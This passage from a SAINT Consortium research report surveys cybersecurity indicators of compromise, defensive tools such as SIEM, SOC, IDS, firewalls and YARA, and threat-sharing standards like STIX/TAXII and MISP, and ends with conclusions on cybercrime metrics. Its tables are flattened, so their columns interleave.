Uncommon Port. Proxy logs, IIS logs, DNS resolution logs and HTTP, SSL, DNS, SMTP logs, etc, are used to detect anomalies.

11.10 Suspicious registry or system file changes

Nomenclature Examples Usage Metrics

Attackers target system Registry or system file Harvesting of payment 49% of security files and configurations changes enable card data, sensitive analysts used Registry attackers to establish data, etc or system file changes persistence and as IOCs in 2017136 leverage of the system. Endpoint detection and Installing packet- remote scanning for sniffing software is detection of malicious common for credit card programs. data harvesting

11.11 Unusual DNS requests

Nomenclature Examples Usage Metrics

Unusual patterns left Patterns left by DNS Connection to external 53% of security by malicious DNS queries are signs of hosts for phishing and analysts used unusual queries unusual activity. other compromises patterns left by Command-and-control such as content malicious DNS queries traffic is important to filtering. as an IOC in 2017137 an attacker to establish a route for malicious An important indicator activity. of malicious activity. Threat intelligence tools and filtering solutions, DNS services help protect against phishing and content filtering

136 https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-sept-2017.pdf 137 https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-sept-2017.pdf Copyright SAINT Consortium. All rights reserved. 85 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

11.12 Unexpected patching of systems

Nomenclature Examples Usage Metrics

Patching is a To lock down the Malicious behaviour 33% of security requirement of good system after an analysts used security whereas infection. The Trojan unexpected patching of unexpected patching is Win32/Patched a.k.a. systems as an IOC in a sign of unusual WinNT/Patched is an 2017138 activity example from 2008.

11.13 Mobile device profile changes

Nomenclature Examples Usage Metrics

Changes to mobile Compromises of Exploits via phishing or 59.2% of corporate configuration profiles mobile devices through spear phishing to gain owned laptops, not set by employer phishing or spear- access to a network via smartphones, tablets & phishing attacks. mobile devices. other devices were breached according to Replacement of apps Incident response for man-in-the-middle teams139 attacks.

11.14 Bundles of data in the wrong place

Nomenclature Examples Usage Metrics

Large quantities of Data compressed in Malicious attacks and NA information and data archive formats. compromises. where they should not Files in unusual be locations such as the Used in threat hunting root folder of the as a red flag. recycle bin, executable files in the temp folder

11.15 Web traffic with unhuman behaviour

Nomenclature Examples Usage Metrics

Unusual web traffic Opening more than an Click-fraud malware 8,448,885,728 Bad Bots behaviour average number of families. detected during a 30 day snapshot – see 9.6

138 https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-sept-2017.pdf

139 https://www.sans.org/cyber-security-intelligence/2018/11/13/its-awfully-noisy-out-there-results-of-the-2018- sans-incident-response-survey Copyright SAINT Consortium. All rights reserved. 86 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

browser windows. Noisy volumes indicate Bad Bots above unusual activity to Using web browsers threat hunters other than the designated one.

11.16 Signs of DDoS activity

Nomenclature Examples Usage Metrics

A DDoS attack is an Flooding the target A form of concealment 52% of security attempt to make a machine with excessive while cybercriminals analysts used signs of network, machine or requests to overwhelm plant malware or steal DDoS or geographic resource unavailable security reporting sensitive data. irregularities as an IOC systems, such as in 2017140 IPS/IDS or SIEM Signs are unavailability solutions, and disable of websites, slow communication network performance, systems failover of firewalls and back-end systems such as file servers unexplainably operating at max system capacity.

140 https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-sept-2017.pdf Copyright SAINT Consortium. All rights reserved. 87 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

12 Indicators - Security There are many elements of security within ICT (information and Communications Technology). The 12 indicators described here are the most relevant within current cyber security and are key indicators of threat prevention. 12.1 Antivirus

Nomenclature Examples Usage Metrics

Anti-virus software is a A non-exhaustive Most anti-virus A Malware Protection software utility that comparative list of programs include an Test assesses an detects, prevents, and antivirus and Internet auto-update feature Antivirus program’s removes viruses, Security software, in the that permits the ability to protect a worms, and other form of comparison program to download system against infection malware from a tables, according to profiles of new viruses, by malicious files: computer. their platform (e.g. enabling the system to desktop and server, check for new threats. @ March 2018 the best- mobile, etc.) and their Antivirus programs are known Antivirus operating systems (e.g. essential utilities for any software providers Windows, OS X, Linux, computer but the choice show between - 100% Solaris, Android, iOS, of which one is very to 99.7% protection142. Ubuntu Touch, important. One AV Windows Phone, etc.) is program might find a shown here141 certain virus or worm while another cannot, or vice-versa.

12.2 Security Information and Event Management (SIEM)

Nomenclature Examples Usage Metrics

Security information SIEM is important, due SIEM is implemented via SIEM operational and event management to its scalability and software, systems, metrics: (SIEM) is an approach to several open source appliances. There are, security management tools. Therefore, useful generally speaking, six ● Number of alerts that combines SIM for SMEs and small main attributes of an handled (per (security information organizations within the SIEM system: analyst, per rule, management) and SEM EU. Examples: per target, etc) (security event Retention: Storing data ● Alert response management) functions OSSIM is the open for long periods so that timing [such as time into one security source version of Alien decisions can be made from triggering to management system. Vault’s Unified Security from more complete review, then to first Management. OSSIM data sets. action, then to combines its native log closure or

141Comparison of antivirus software - https://en.wikipedia.org/wiki/Comparison_of_antivirus_software 142 Malware Protection Test - 03 2018 - https://chart.av-comparatives.org/chart1.php Copyright SAINT Consortium. All rights reserved. 88 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

storage and correlation Dashboards: Used to escalation. capabilities with analyse (and visualize) ● Number of incidents numerous open source data in an attempt to opened based on projects to build a recognize patterns or SIEM alerts (by time complete SIEM143. target activity or data unit, by analyst, by that does not fit into a target, etc) ELK (Short for normal pattern. Elasticsearch, Logstash, and Kibana) the most Correlation: Sorts data popular open source into packets that are SIEM tool available, but meaningful, similar and not a standalone share common traits. solution144. This can activate certain protocols to alert users, Prelude is a SIEM like notifications sent to framework that unifies the dashboard, an various other open automated email or text source tools. It is the message. open source version of the commercial tool by Data Aggregation: Data the same name145. can be gathered from any number of sites: Splunk Quick Start for servers, networks, SIEM provides analytics- databases, software and driven security email systems. information and event management solution. It Compliance: Data has a free (limited size) analysis for compliance open source version146 with company, organizational or government policies.

143 OSSIM - https://www.alienvault.com/products/ossim 144 ELK - https://www.elastic.co/ 145 Prelude - https://www.prelude-siem.org/ 146 Splunk - https://www.splunk.com/en_us/products/quick-start-bundles/siem.html Copyright SAINT Consortium. All rights reserved. 89 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

12.3 Managed Security Services (MSS)

Nomenclature Examples Usage Metrics

An approach to Globally the biggest Most organizations In a recent survey managing an provider of MSS to (58%) are still sourcing (2018 – Alien Vault) organization's security large companies is IBM their security the key drivers for needs. The services are which monitors 35 operations programs enterprises’ use of normally outsourced to billion security events in-house. MMS are: a service provider that daily in more than 130 oversees other countries. Increasingly popular 47% Lack of companies' network sourcing alternatives internal security and information system Although the security include a hybrid of in- personnel/expertise security. Functions of a offerings from house and outsourced managed security managed security services (16%), 44% 24x7 security service include 24/7 services companies coverage monitoring and vary, the following Outsourcing to a management of features are common managed security 42% Cost savings by intrusion detection to most of them: service provider (12%), outsourcing systems and firewalls, overseeing patch Distributed denial of Outsourcing to a management/upgrades, service (DDoS) managed threat performing security protection detection and response assessments/audits, provider (5%).147 and responding to Advanced threat emergencies. intelligence services

Secure messaging gateways, secure web gateways and web application firewalls delivered "as a service"

Managed vulnerability management

Identity and access management

12.4 Security Operations Centre (SOC)

Nomenclature Examples Usage Metrics

A facility that houses A SOC should enable Using a SOC is As noted in EY’s survey an information defence of the perimeter primarily to detect, on SOC users: security team use security information analyse, and respond responsible for and event management to cybersecurity Mounting threat levels monitoring and (SIEM) tools i.e.: incidents using a require a more robust analysing an combination of response and many organization’s Network information, such technology solutions organizations continue security posture on as hashes, URLs, and a strong set of to increase an ongoing basis, connection details, etc. processes. Security their spending on and managed within operations centres cybersecurity. the organization. The Vulnerability information are typically staffed goal is to detect, reported by vulnerability with security analysts 70% say they analyse, and respond scanners and engineers as well require up to 25% to cybersecurity as managers who more funding, incidents. Security Security intelligence feeds oversee security operations centres operations. 30% reported they are typically staffed Topology information require even more with security than this. analysts and Web proxy URL engineers as well as However, only 12% managers who External-facing firewall expect to receive an oversee security increase of 148 operations. Antivirus more than 25% .

Virtual private networks (VPNs)

Radius/Lightweight Directory Access Protocol (LDAP)

Endpoint monitoring

Domain name system (DNS)

Dynamic Host Configuration Protocol (DHCP)

Intrusion prevention (IPS)

147 https://www.alienvault.com/blogs/security-essentials/managed-security-trends-and-usage 148 https://www.ey.com/Publication/vwLUAssets/GISS_report_2017/%24FILE/REPORT%20- %20EY%20GISS%20Survey%202017-18.pdf Copyright SAINT Consortium. All rights reserved. 91 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

and detection (IDS) systems

Operating systems (OSs)

Other syslogs

12.5 The Cyber Kill Chain

Nomenclature Examples Usage Metrics

The Cyber Kill Chain is a Training for the cyber It provides tools that Metrics for breaking kill phase-based model to kill chain utilises cyber help strengthen the chains: describe the stages of range. This is a virtual stability, security and These metrics identify an attack, which also environment that is performance of the most vulnerable helps inform ways to used for cyber warfare cyberinfrastructures and points in attack chains. prevent such attacks. training and cyber IT systems used by Scan for these key These stages, which are technology government and metrics and you will borrowed from the development. military agencies. address the most military and developed serious attack path by Lockheed Martin149, The framework is part of vulnerabilities: are referred to as: the Intelligence Driven Defence model for The number of Internet ● Find identification and facing computers ● Fix prevention of cyber servers that are ● Track intrusions activity. The exploitable ● Target model identifies what ● Engage the adversaries must Identify servers on the ● Assess complete in order to network perimeter, in achieve their objective. the DMZ, or deployed deep in your network and Internet addressable.

Audit for services that are exposed to the Internet via open ports where an attack path could jump into an internal network.

The number of Internet browsing computers with exploitable clients

149 The Cyber Kill Chain - https://www.lockheedmartin.com/us/what-we-do/aerospace-defense/cyber/cyber-kill- chain.html Copyright SAINT Consortium. All rights reserved. 92 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

Identify all assets that connect externally to the Internet and the ports that are used. Identify specific client- side applications such as Skype, Facebook, YouTube, etc.

Alert on devices that browse the Internet with unsupported or outdated software150.

12.6 Authentication

Nomenclature Examples Usage Metrics

Authentication is the Programming / web In order to prevent the There is a lack of process of verification application example: key method to bypass standard performance that an individual, entity authentication, i.e. metrics regarding the or website is who it ● Requesting Brute-Force Attacks. use of knowledge-based claims to be. Authentication Web application and authentication (KBA) for Authentication in the Using an Internal software developers remote identity context of web Certificate should: proofing. KBA-PMP's applications is ● Requesting goal is to establish commonly performed authentication using ● Implement Proper standard performance by submitting a user an external Password Strength metrics for knowledge- name or ID and one or certificate Controls based authentication, more items of private ● Validating ● Password Length following a information that only a authentication ● Password transnational given user should know. ● Enforcing Complexity perspective151. authentication ● Password Session Management is Topologies KBA-PMP Best Practices: a process of ● Implement Secure authentication by which Password Recovery ● Identity solutions a server maintains the Mechanism will be secure and state of an entity ● Store Passwords in a resilient. interacting with it. This Secure Fashion ● Identity solutions is required for a server ● Transmit Passwords will be to remember how to Only Over TLS or interoperable. react to subsequent Other Strong ● Identity solutions requests throughout a Transport will be cost-effective transaction. ● Require Re- and easy to use.

150 Metrics for breaking kill chains - https://www.tenable.com/blog/identifying-the-weakest-links-in-cyber-kill-chains 151 OWASP Knowledge Based Authentication Performance Metrics Project https://www.owasp.org/index.php/OWASP_Knowledge_Based_Authentication_Performance_Metrics_Project Copyright SAINT Consortium. All rights reserved. 93 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

authentication for Sensitive Features

12.6.1 Multi-factor authentication Multi-factor authentication (MFA) is a method of confirming a user's claimed identity in which a user is granted access only after successfully presenting 2 or more pieces of evidence (or factors) to an authentication mechanism: knowledge (something they and only they know), possession (something they and only they have), and inherence (something they and only they are). Two-factor authentication (also known as 2FA) is a type (subset) of multi-factor authentication. It is a method of confirming a user's claimed identity by utilizing a combination of two different factors: ● something they know ● something they have ● something they are. A good example of two-factor authentication is the withdrawing of money from an ATM; only the correct combination of a bank card (something that the user possesses) and a PIN (personal identification number, something that the user knows) allows the transaction to be carried out. Biometric authentication / recognition (also known as biometrics) refers to the automated recognition of individuals based on their biological and behavioural traits (ISO/IEC JTC1 SC37152 with 121 existing standards, and 32 under development). Examples of biometric traits include fingerprint, face, iris, palmprint, retina, hand geometry, voice, signature and gait. 12.6.2 Authorization Authorization is a process by which a server determines if the client has permission to use a resource or access a file. Authorization is usually coupled with authentication so that the server has some concept of who the client is that is requesting access. The type of authentication required for authorization may vary; passwords may be required in some cases but not in others. In some cases, there is no authorization; any user may be able to use a resource or access a file simply by asking for it. Most of the web pages on the Internet require no authentication or authorization.

12.7 Digital epidemiology (evidence-based practice)

Nomenclature Examples Usage Metrics

The study of patterns This relatively new field To apply the digital See Figure XX below, of disease using digital of study is progressing study of patterns and an innovative model data. As a advancing through the availability disease control to illustrating how to field within of large datasets evidence-based generate metrics from cybersecurity it is generated within practices within the evidence-based defined as the threat analysis and field of cybersecurity practices for digital

152 ISO/IEC JTC 1/SC 37 - https://www.iso.org/committee/313770.html Copyright SAINT Consortium. All rights reserved. 94 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

adaptation of recent advances in (best research epidemiology. techniques used in artificial intelligence. evidences, expert mathematical knowledge and epidemiology in stakeholder disease (health) control experiences) - see to the study of Figure 12.1 below, computational viruses SAINT model of the and threat analysis. value of digital epidemiology with evidence-based practices.

The overall theme of WP2 The Metrics of Cybersecurity is that it is “… all about the evidence and the data…”. Digital epidemiology and Evidence-Based Practices (EBP) enable the building of a framework in support of making cyber security metrics an empirical science. We illustrate this in the model shown in Figure 12.1. This represents an innovative paradigm where metrics are gathered from a number of EBP sources which we call Scientific Knowledge, Consumer Knowledge, and Practitioners’ Expertise. We call this the SAINT triad of EBP for digital epidemiology. Advances in artificial intelligence will aid in the gathering of evidences from sources that previously were not readily available. The combination of rich evidences will help promote innovative solutions to attack and threat prevention such as the SAINT model proposes.

Figure 12.1: The SAINT Triad of Evidence-Based Practices for Digital Epidemiology

12.8 Data-centric security

Nomenclature Examples Usage Metrics

The data-centric Data breaches are A comprehensive data- Increasingly, businesses approach to evolving and becoming centric security strategy are exploring data- cybersecurity is based increasingly more includes the following centric security on the need to protect complex. a breach can 10 key elements153: approaches to allow an organization’s involve one or more them to lock down user sensitive data, rather paths to your data, ● Data discovery authentication and than the IT including: Excessive, ● Data classification access rights. For infrastructure. By inappropriate, and ● Data tagging & example: Alphabet Inc.’s protecting sensitive unused user privileges watermarking (Google) autonomous information in the files ● Data loss prevention vehicle unit, Waymo and databases that ● Privileged user abuse ● Data visibility LLC, filed a lawsuit contain the data-centric ● Insufficient web ● Encryption strategies against Uber approach implies taking application security ● Enhanced gateway Technologies Inc., advantage of cloud ● Database controls alleging the theft of computing, mobile misconfigurations ● Identity management trade secrets related to technology, and other and/or missing ● Cloud access the lidar scanner, a innovations without patches ● Continuous radar-like device. A placing an organization ● Query injections — education former engineer, at risk. SQL injections that Anthony Levandowski, is target traditional accused in the suit of databases and NoSQL having downloaded injections that target thousands of Big Data platforms documents before ● Malware-infected leaving Waymo to start devices and his own self-driving tech unsecured storage company, Otto, which media was sold to Uber only ● Social engineering — months later for $680 baiting, phishing, million. pharming, pretexting, ransomware, tailgating, and others.

12.9 Data encryption

Nomenclature Examples Usage Metrics

Data encryption is the The usage of HyperText Genuine data Percentage of Web practice of electronically Transfer Protocol Secure encryption requires that Pages Loaded by Firefox

153 10 Keys to Data-Centric Security - 2016 - http://focus.forsythe.com/articles/512/10-Keys-to-Data-Centric-Security Copyright SAINT Consortium. All rights reserved. 96 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

converting information (HTTPS), instead of three things be in place worldwide using HTTPS into a different format, HyperText Transfer at all times: in Jan 2014 was ~30%: i.e. ciphertext, a Protocol (HTTP). Using authentication, non- By Jan 2018 it had risen language that HTTPS, the users repudiation and to ~70%. This is in the transforms plaintext computer and the integrity156. main due to the use of: files, folders, application website server agree on and software language a "code" between them, ● Authentication “HTTPS Everywhere” into undecipherable and then they scramble means that where and “Let’s Encrypt”, a text. Each user uses the messages, e.g. data came from is community initiative, encryption keys for the logins, online payments, quickly and easily providing free, specific ciphertext etc. using that "code" so verifiable to ensure automated, and open germane to their that no one in between the safety and certificate authority enterprise. Only users can read or intercept authenticity. (CA), digital certificates with authorization and them. ● Non-repudiation they need in order to encryption keys can is a way to set up enable HTTPS (SSL/TLS) open anything HTTPS for a website communications so for websites157 encrypted for the safety needs to be tested that the original For example SAINT of the venture. independently, for sender of a file, website uses a Let's example an SSL Report: folder, email or other Encrypt Authority X3, cyberdefcon.com type of data is unable with a strong RSA 2048 (54.154.124.30) shows to say they didn't bits (SHA256withRSA) an A+ rating154 send anything that cipher: https://project- originated from their saint.eu/ The EFF (Electronic machine or smart Frontier Foundation) device. Every launched “HTTPS person's electronic Everywhere” signature is different HTTPS Everywhere is a in non-repudiation browser extension that assurance. encrypts all ● Integrity communications with When referring to many major websites, computing and making browsing more encryption integrity secure155. is evidence that a message and any of the contents of a message haven't been altered in any way since the message was originally sent.

12.10 Firewall

154 SSL Report: cyberdefcon.com (54.154.124.30) - https://www.ssllabs.com/ssltest/analyze.html?d=cyberdefcon.com 155 HTTPS Everywhere - https://www.eff.org/https-everywhere 156 Data Encryption - 2017 - https://www.tintri.com/glossary/data-encryption 157 Let’s Encrypt - https://letsencrypt.org/ Copyright SAINT Consortium. All rights reserved. 97 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

Nomenclature Examples Usage Metrics

A firewall is a network Next-generation firewall Firewalls have been a Although difficult to security device that (NGFW) first line of defence in assess the security of monitors incoming and Firewalls have evolved network security for modern enterprise outgoing network traffic beyond simple packet over 25 years. They networks because they and decides whether to filtering and stateful establish a barrier are usually dynamic allow or block specific inspection. Most between secured and with configuration traffic based on a companies are controlled internal changes (such as defined set of security deploying next- networks that can be changes in topology, rules. generation firewalls to trusted and untrusted firewall rules, etc). block modern threats outside networks, such such as advanced as the Internet. Graphical security malware and models (e.g., Attack application-layer A firewall can be Graphs and Attack attacks. hardware, software, or Trees) and security both. metrics (e.g., attack A next-generation cost, shortest attack firewall must include: path) are widely used to ● Standard firewall systematically analyse capabilities like the security posture of stateful inspection network systems158. ● Integrated intrusion prevention ● Application awareness and control to see and block risky apps ● Upgrade paths to include future information feeds ● Techniques to address evolving security threats

12.11 GDPR (General Data Protection Regulation)

Nomenclature Examples Usage Metrics

The General Data GDPR, The Checklist for Cisco’s Study validates 3,200 global security Protection Regulation Compliance: the link between good and privacy (GDPR) is a legal privacy practice and professionals in 18 framework that sets • Achieve Customer business benefits as countries across guidelines for the Consent. respondents report industries responded

158 Evaluating the Effectiveness of Security Metrics for Dynamic Networks - 09 2016 - https://ieeexplore.ieee.org/document/8029451/

collection and • Hire A Data shorter sales delays as to a survey159 about processing of personal Protection Officer well as fewer and less their organisations’ information of (DPO) costly data breaches. privacy practices to individuals within the • Perform A Data reveal: European Union (EU). Protection Impact Length of sales delays • 87% of companies ... GDPR came into Assessment (DPIA) from customer privacy are experiencing delays effect across the EU on • Sound the Alarm on concerns reduced by in their sales cycle due May 25, 2018. Data Breaches. 50 percent. GDPR- to customers’ or • Respect the Right to ready organizations see prospects’ privacy Be Forgotten. lowest risk of data concerns, up from 66% breach. last year –due to the greater awareness due to GDPR and data breaches in the news. • Sales delays varied from 2.2 to 5.5 weeks, in Europe with Italy and Russia at the lower end of the range, and Spain at the higher. Delays can result in sales being lost. • Awareness of GDPR-readiness varied from 42% to 75% with Spain, Italy, the UK and France at the top of the range, and China, Japan and Australia at the other end. • Only 37% of GDPR- ready companies experienced a data breach costing more than $500,000, compared with 64% of the least GDPR-ready companies.

12.12 Intrusion detection system (IDS)

Nomenclature Examples Usage Metrics

An intrusion detection Built-in host intrusion Leverage intrusion With the advances in system (IDS) monitors detection (HIDS), detection for any information technology network traffic and network intrusion environment with built- (IT) criminals are using

159 2019 Data Privacy Benchmark Study – CISCO - https://newsroom.cisco.com/press-release- content?type=webcontent&articleId=1963564 Copyright SAINT Consortium. All rights reserved. 99 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

monitors for suspicious detection (NIDS), as well in cloud IDS, network cyberspace to commit activity and alerts the as cloud intrusion IDS, and host-based IDS numerous cybercrimes. system or network detection for public (including File Integrity Cyber infrastructures administrator. There are cloud environments Monitoring (FIM)) are highly vulnerable to also network based including AWS and Use the Kill Chain intrusions and other (NIDS) and host based Microsoft Azure. Should Taxonomy to quickly threats. Physical devices (HIDS) intrusion detect threats as they assess threat intent and and human intervention detection systems. emerge in critical cloud strategy. are not sufficient for and on-premises monitoring and infrastructure. Make informed protection of these decisions with infrastructures; hence, contextual data about there is a need for more attacks, including a sophisticated cyber description of the defence systems that threat, its method and need to be flexible, strategy, and adaptable and robust, recommendations on and able to detect a response wide variety of threats and make intelligent Use automatic real-time decisions. notifications so you can Numerous bio-inspired be informed of key computing methods of threats as they happen. Artificial Intelligence Work more efficiently have been increasingly with powerful analytics playing an important that uncover threat and role in cybercrime vulnerability details - all detection and in one console160 prevention161.

12.12.1 Intrusion prevention system An Intrusion Prevention System (IPS) is a network security/threat prevention technology that examines network traffic flows to detect and prevent vulnerability exploits. Vulnerability exploits usually come in the form of malicious inputs to a target application or service that attackers use to interrupt and gain control of an application or machine. Following a successful exploit, the attacker can disable the target application (resulting in a denial-of-service state) or can potentially access to all the rights and permissions available to the compromised application.

160 Accelerate Threat Detection with Intrusion Detection Systems - https://www.alienvault.com/solutions/intrusion- detection-system 161 APPLICATIONS OF ARTIFICIAL INTELLIGENCE TECHNIQUES TO COMBATING CYBER CRIMES - 01 2015 - https://arxiv.org/ftp/arxiv/papers/1502/1502.03552.pdf Copyright SAINT Consortium. All rights reserved. 100 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

13 Interoperable ICT Solutions – Open Source Interoperable ICT solutions are important in the role of Cyber Threat Intelligence sharing. As outlined above, indicators are an important component of cyber intelligence but there are many others that are needed to provide a comprehensive cyber security solution. Sharing of information can enhance that ability. It is also important that data is actionable. A lack of standardisation in technical specifications and languages can hinder these processes. The EU commission has recognised the importance of voluntary standardisation in product or services markets which encourages compatibility and interoperability between products and services, foster technological development and support innovation. The European multi-stakeholder platform on ICT standardisation evaluated and approved the identification of the following technical specifications for referencing in public procurement162: SPF-Sender Policy Framework for Authorizing Use of Domains in Email (SPF), STARTTLS-SMTP Service Extension for Secure SMTP over Transport Layer Security (STARTTLS-SMTP) and DANE-SMTP Security via Opportunistic DNS-Based Authentication of Named Entities Transport Layer Security (DANE-SMTP) developed by Internet Engineering Task Force (IETF); Structured Threat Information Expression (STIX 1.2) and Trusted Automated Exchange of Indicator Information (TAXII 1.1) developed by the Organization for the Advancement of Structured Information Standards (OASIS). The commission's recognition of ‘STIX 1.2’, a language for describing cyber threat information, and ‘TAXII v1.1’ technical specification, both developed by OASIS, is an important advance towards standardisation and interoperable in threat intelligence sharing as well as procurement of hardware, software and information technology services. ‘STIX 1.2’ is a language for describing cyber threat information in a standardised and structured manner. It covers major topics when it comes to cyber threat data, facilitating the analysis and exchange about attacks. It characterises an extensive set of cyber threat information, including indicators of adversary activity such as IP addresses and file hashes and contextual information regarding threats such as adversary Tactics, Techniques and Procedures (‘TTPs’); exploitation targets; Campaigns and Courses of Action (‘COA’). Together this information completely characterises the cyber adversary's motivations, capabilities, and activities, and thus, help in defending against attacks. ‘TAXII v1.1’ technical specification standardises the trusted, automated exchange of cyber threat information. TAXII defines services and message exchanges for sharing actionable cyber threat information across organisation, product, or service boundaries in view of the detection, prevention, and mitigation of cyber threats. TAXII empowers organisations to achieve improved situational awareness about emerging threats and it enables organisations to easily share information with partners, while leveraging existing relationships and systems. The value of cyber threat intelligence within a comprehensive CTI ecosystem is illustrated in Figure 13-1 below. Interoperability through standardisation of processes is essential in the building of effective collaborative frameworks. Examples of open source platforms built with collaborative capabilities are given in this section.

162 COMMISSION IMPLEMENTING DECISION (EU) 2017/2288 of 11 December 2017 on the identification of ICT Technical Specifications for referencing in public procurement http://eur-lex.europa.eu/legal- content/EN/TXT/?uri=CELEX:32017D2288 Copyright SAINT Consortium. All rights reserved. 101 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

Figure 13.1: ENISA CTI Modules163 13.1 OASIS - STIX, TAXII, CYBOX STIX 1.2, developed by OASIS, is a language for describing cyber threat information in a standardised and structured manner. It covers major topics when it comes to cyber threat data, facilitating the analysis and exchange about attacks. It characterises an extensive set of cyber threat information, including indicators of adversary activity such as IP addresses and file hashes and contextual information regarding threats such as adversary Tactics, Techniques and Procedures (TTPs); exploitation targets; Campaigns and Courses of Action (COA). Together this information completely characterises the cyber adversary's motivations, capabilities, and activities, and thus, help in defending against attacks. TAXII v1.1 technical specification standardises the trusted, automated exchange of cyber threat information. TAXII defines services and message exchanges for sharing actionable cyber threat information across organisation, product, or service boundaries in view of the detection, prevention, and mitigation of cyber threats. TAXII empowers organisations to achieve improved situational awareness about emerging threats and it enables organisations to easily share information with partners, while leveraging existing relationships and systems. 13.2 MISP The MISP threat sharing platform which is EU developed and based. Is a free and open source software helping information sharing of threat intelligence including cyber security indicators. A threat intelligence platform for gathering, sharing, storing and correlating Indicators of Compromise of targeted attacks, threat intelligence, financial fraud information, vulnerability information or even counter-terrorism information. It provides for storage of a user’s IOCs (Indicators of Compromise) in a structured manner, and thus enjoy the correlation, automated exports for IDS, or SIEM, in STIX or OpenIOC and synchronize to other MISPs. Providing leverage, the IOC’s value with reduced effort and in an automated fashion.

13.3 YARA YARA is the name of a rule-based tool developed to identify and classify patterns of particular strains or entire families of malware. It was originally developed by Victor Alvarez of Virustotal164. It is a multi-platform program running on Windows, Linux and Mac OS X. A Yara rule name is created to describe malware families based on textual or binary patterns. The rules consist of sets of strings and a boolean expression which determine its logic. The language used has traits of Perl compatible regular expressions.

14 Conclusions and Recommendations 14.1 Conclusions This deliverable combines the research of D2.1 and D2.2 to arrive at a comprehensive body of work on the state-of-the-art in active sources of cyber-threat activity including: blacklists, cyber-attack measurements, malware listing, infected websites and phishing activity. A SAINT taxonomy was developed using indicators from each of these areas and defined using four elements for simplicity and reference, i.e. Nomenclature, Examples, Usage, and Metrics. A separate group of Indicators, that apply specifically to Econometrics, are arranged across 2 key elements of Nomenclature, and Metrics & Econometric analysis. The result is presented as a core SAINT objective. The key conclusions from the research and analysis performed for the deliverable: (1) The need for comprehensive and consistent measurement methodologies: Attempts have been made over recent years to derive estimates of the metrics and costs associated with cybercrime. It is often found that across a wide range and spectrum of these studies that there are major inconsistencies in the approach to metric analysis and to the way results are presented. Studies often adopt diverse types of measurements during the course of an analysis, for example, annual costs, costs per attack, costs per sector; making it a challenge for comparable analysis, such as benchmarking, to be used in any meaningful way. An example of the need for consistent metrics and costs associated with cybercrime, is shown within the UK government publication "Understanding the costs of cybercrime - A report of key findings from the Costs of Cyber Crime Working Group, Research Report 96, Home Office Science Advisory Council UK165 . It was found that the poor quality of data gathered during the surveys was a major limitation and lead to major inconsistencies in the estimates and analyses. (2) The need for good quality data with comparative and econometric value: Reports and surveys have intrinsic importance within comparative and econometric processes and analyses. They provide evidences for the benefit of decision makers and stakeholders, for example. In D2.3 “Initial Report on the Comparative Analysis of Cybercrime Victims” (Section 4), we provided a model of the type of data that provides such value. Here, ‘Time spent / lost per victim of cybercrime’ was included within the measurements used. This enabled results to be calculated specifically for EU purposes as well as highlighting ‘time and further costs of cybercrime victims’ as important factors in this type of analysis. There are numerous surveys and reports on cybercrime and cybersecurity that seek to gain citizens or stakeholders opinions on cybercrime and cybersecurity. An EU example of this is the Europeans’ attitudes towards cyber security, June 2017 Report, Special Eurobarometer 464a, by Eurostat, the widest survey carried out in the 28 Member States of the European Union between 13 and 26 June 2017. Some 28,093 EU citizens from different social and demographic categories were interviewed at home and in their native language. These types of studies serve to demonstrate that there can be a difference between the way in which respondents would prefer to act (qualitative), as opposed to what actually happens (quantifiable). Inconsistencies in human behaviour in contexts of uncertainty (the incertainty of cyber attacks/incidents

165 Understanding the costs of cybercrime - 01 2018 - https://www.techuk.org/images/understanding-costs-of-cybercrime-horr96.pdf

Copyright SAINT Consortium. All rights reserved. 104 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies occurrence) is an important consideration and a topic within the remit of behavioural economics. For example, (a) in one area the EU report shows from respondents; “If they experienced or were the victim of cybercrime, most respondents say they would contact the police, especially if the crime was identity theft (85%), online banking fraud (76%), or if they accidentally encountered child abuse content online (76%)”166. (b) This must be compared with the actual numbers reporting cybercrime. For example, according to the Safety Monitor published recently by Statistics Netherlands (CBS), showing that “Three quarters of cybercrime cases are not reported, only (27%) of these crimes were reported to the police or other institutions167”. Obviously, any decision maker or stakeholder could gain very different conclusions from each of these reports, i.e. reporting on cybercrime from (a) It is working well and the majority would report, (b) What can we do or how do we encourage more to report. (3) The need for metrics and measures within standard cyber security taxonomies: The research carried out during Task 2.1, and presented in this final deliverable on Cybersecurity Indicators & Open Source Intelligence Methodologies, has provided valuable input for the whole of the SAINT project. The representation of the SAINT taxonomy is innovative in its inclusion of current sources of measurement for each of the indicators, where these currently exist. The list is not exhaustive and not all of the metric sources are verifiable but this has been a first attempt to bring together meaningful measurements to a vast array of known threat indicators. This research supports the view that metrics within cybersecurity is not just a nice add-on but a necessity. Further, the SAINT indicators form a major contribution to the global view of cybercrime as depicted in SAINT’s Global Security Map tool. As well, the SAINT indicators are integral to the econometric model of cybersecurity in Finland as outlined in D2.4 “Final Report on the Comparative Analysis of Cybercrime Victims” and the SAINT whitepaper ‘Traficom’ (formerly Ficora), which is a major result of the SAINT project and a showcase for the importance of metrics in this field. In the words of the management consultant and educator, Peter Drucker, “If you can’t measure it, you can’t manage it”168. SAINT research exhibits how it is possible to achieve both through the Finnish model of cybersecurity management. 14.2 Recommendations For this body of work, active sources of threat analysis have been surveyed with a synopsis provided through the SAINT taxonomy. In the opinion of the authors, the addition of examples of relevant sources of metrics, where these are available, is an innovative approach to taxonomy methodologies. This research and its results have been 